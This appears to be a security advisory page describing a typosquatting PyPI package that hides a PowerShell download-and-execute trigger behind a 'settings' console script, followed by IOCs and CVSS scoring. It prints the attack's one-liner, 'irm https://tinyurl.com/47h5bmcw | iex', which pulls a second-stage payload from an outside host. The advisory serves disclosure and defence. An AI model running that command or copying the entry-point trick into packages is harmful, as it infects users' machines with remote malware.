VDB

GCVE-110-OSM-2026-2549

GCVE-110-OSM-2026-2549
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published April 16, 2026
The malicious PyPI package "cpu-optimizers2.33" is a typosquatting attack that masquerades as a CPU optimization tool while containing a trojanized version of the popular Python requests library. The package targets Windows systems by executing a PowerShell command that downloads and executes a second-stage payload from a shortened URL when the installed console script is run. The malware uses social engineering by stealing the legitimate requests library's metadata, including author names and project descriptions, to appear trustworthy to potential victims. Upon installation, the package creates a console script named "settings" that serves as the infection vector, executing malicious PowerShell code that fetches additional payloads from external infrastructure. The malicious code is triggered through a console script entry point defined in the package's pyproject.toml configuration, which maps the "settings" command to execute the main function in requests.starter module. The payload itself consists of a simple Python script that uses the subprocess module to launch PowerShell with specific arguments designed to download and execute code from a remote server. The PowerShell command "irm https://tinyurl.com/47h5bmcw | iex" uses PowerShell's Invoke-RestMethod to fetch content from a shortened URL and immediately executes it using Invoke-Expression, allowing the attackers to dynamically serve different payloads or update their malicious code without modifying the original package. The package attempts to blend in by including a complete replica of the requests library codebase, making it appear legitimate during casual inspection while hiding the malicious functionality in the starter.py module that would only be executed when the victim runs the "settings" command. IOCs: - Package SHA256: 1d1bdb312e7a1cb9b1b8d71efb1337f43dd8dcc01d9ea20dadd89d63e1e38f3e — package file hash - Package MD5: 25c66c9104a8e1849e42bf9ce651d34d — package file hash - Malicious File Path: src/requests/starter.py — contains PowerShell execution payload - Malicious File SHA256: 69150d0d2698394a3d31c83a07fe2cbbeefe6b6a1de0b627e670c19e365da752 — starter.py file hash - Malicious File MD5: 8c7c97e1302aeb0298061368f8dc0666 — starter.py file hash - C2 URL: https://tinyurl.com/47h5bmcw — second-stage payload download URL - Console Script: settings — malicious command installed by package - Entry Point: requests.starter:main — Python module execution path Decoded/deobfuscated IOCs: - domains: trust.python.org, on.org

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowncpu-optimizers2.33all (affected)

References

advisory
vendor

Browse GCVE Records

73,442 records in the GCVE database · Updated July 17, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›